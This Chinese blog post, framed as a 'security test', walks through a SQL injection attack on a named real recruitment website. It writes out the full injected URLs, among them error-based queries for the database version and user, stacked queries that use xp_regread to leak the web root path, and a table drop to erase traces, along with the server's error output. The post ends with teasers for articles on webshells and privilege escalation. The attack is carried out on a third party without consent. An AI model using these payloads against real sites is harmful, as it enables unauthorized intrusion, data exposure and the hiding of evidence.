安全检测ASP.net开发网站实例

所属分类: 网络安全 / 黑客入侵 阅读数: 1549
收藏 0 赞 0 分享
今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?顺便打开一条消息 http://www.cnwill.com/NewsShow.aspx?id=4847 ,然后加一个' 看看出现什么?我晕。。
Source: .Net SqlClient Data Provider
Description: 字符串 '' 之前有未闭合的引号。
TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)
似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入
http://www.cnwill.com/NewsShow.aspx?id=4844 and 0<;>(select @@version)--
提示:
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
是个2000的Enterprise server而且SP4了。。然后
_name">http://www.cnwill.com/NewsShow.aspx?id=4844 and 0<;>user_name()
提示:
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哦?用dbo的身份连接?应该有搞头。。
首先按照破解ASP网站的方法,要他的绝对路径用以下,第一步建立一个表:
http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
把web路径写进去
http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
还是让他不匹配,显示错误
http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
得到提示:
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 'Y:\Web\烟台人才热线后台管理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哈哈哈。。路径暴露了。。
接下来删除痕迹
http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
后边该怎么做就不多说了。。和安全检测ASP的网站一样。。
更多精彩内容其他人还在看

Mysql 另类盲注中的一些技巧小结

很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~
收藏 0 赞 0 分享

饶过Xplog70.dll玩入侵(参考防范)

深夜了,好友“如影随行”突然发来消息,说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手,然后直接用Xp_cmdshell添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_cmdshell也执行不了。
收藏 0 赞 0 分享

SQL注入攻击的种类和防范手段

观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的。虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。
收藏 0 赞 0 分享

手动mysql 高级注入实例分析

为了 方便 自己随手写了个 sql.php注入点 。经典的 id没有过滤 造成 sql语句带入参数 形成注入, 对了 大家导入test.sql 这个数据库文件吧
收藏 0 赞 0 分享

通过MySQL系统得到cmdshell的方法与防范

这篇文章主要介绍了对于安全设置不是很好的服务器,通过mysql来获取cmdshell的方法,后面我们会给出防范措施。
收藏 0 赞 0 分享

手工注入拿到管理员密码登陆后台 图文

对大家来说,入侵并不是一个很陌生的话题!但是这次要讲的不是入侵,而是安全检测!
收藏 0 赞 0 分享

serv_u提权记录: 530 Not logged in, home directory does not exist

SU的提权可以溢出,但是出错了。不是限制了cmd命令,注意Recv: 530 Not logged in, home directory does not exist.
收藏 0 赞 0 分享

网站拿webshell一技巧

在bhst看到的一篇文章,自己也尝试去拿拿看,但是还是没成功,后来看了下楼下的人竟然拿到了,问题还是在于自己不细心。
收藏 0 赞 0 分享

ACCESS数据库后台sql语句执行导shell的方法

一个垃圾论坛,access数据库,无其他可利用之处,不过有个sql语句执行功能,绝对路径也知道,小弟对sql语句不懂,记得如果是mysql数据库root权限可以导出SHELL,这个是否也能导出shell呢?
收藏 0 赞 0 分享

webshell下提权两个小技巧分享

webshell下提权两个小技巧分享,需要的朋友可以测试下。
收藏 0 赞 0 分享
查看更多